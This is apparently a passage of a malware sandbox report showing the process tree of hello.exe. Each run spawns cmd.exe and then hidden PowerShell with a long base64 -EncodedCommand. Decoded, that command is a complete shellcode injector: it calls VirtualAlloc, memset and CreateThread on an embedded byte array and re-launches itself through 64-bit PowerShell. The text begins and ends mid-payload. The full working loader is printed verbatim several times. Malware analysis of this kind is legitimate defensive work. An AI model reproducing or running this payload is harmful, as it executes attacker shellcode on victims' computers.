sADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:5572

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:7720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:6384

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:6852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4A